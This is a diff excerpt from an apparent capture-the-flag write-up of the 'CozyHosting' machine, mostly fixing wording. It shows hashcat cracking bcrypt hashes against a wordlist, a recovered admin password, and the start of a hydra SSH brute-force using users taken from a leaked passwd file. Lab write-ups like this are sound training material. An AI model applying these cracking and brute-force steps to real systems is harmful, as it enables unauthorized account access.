Paliak/PaliaksNotes/docs/CozyHosting/index.md

 (2 rows)
 ```

-Let's start cracking the hashes and have a look through the linpeas output:
+Let’s start cracking the hashes and have a look through the linpeas output:

 ```bash
 $ hashcat --user hashes -m 3200 rockyou.txt
 ```

-Nothing really interesting in linpeas output but we get a from password hashcat!
+Nothing interesting in linpeas output but we get a password from hashcat!

 ```bash
 $ hashcat --user hashes -m 3200 rockyou.txt --show
 admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
 ```

-Let's run hydra on the on ssh and see if we can get logged in:
+Let’s run hydra on the on ssh and see if we can get logged in:

 ```BASH
 $ cat loot/leaked_passwd | grep sh$ | awk -F ':' '{print $1}' | tee loot/leakedUsers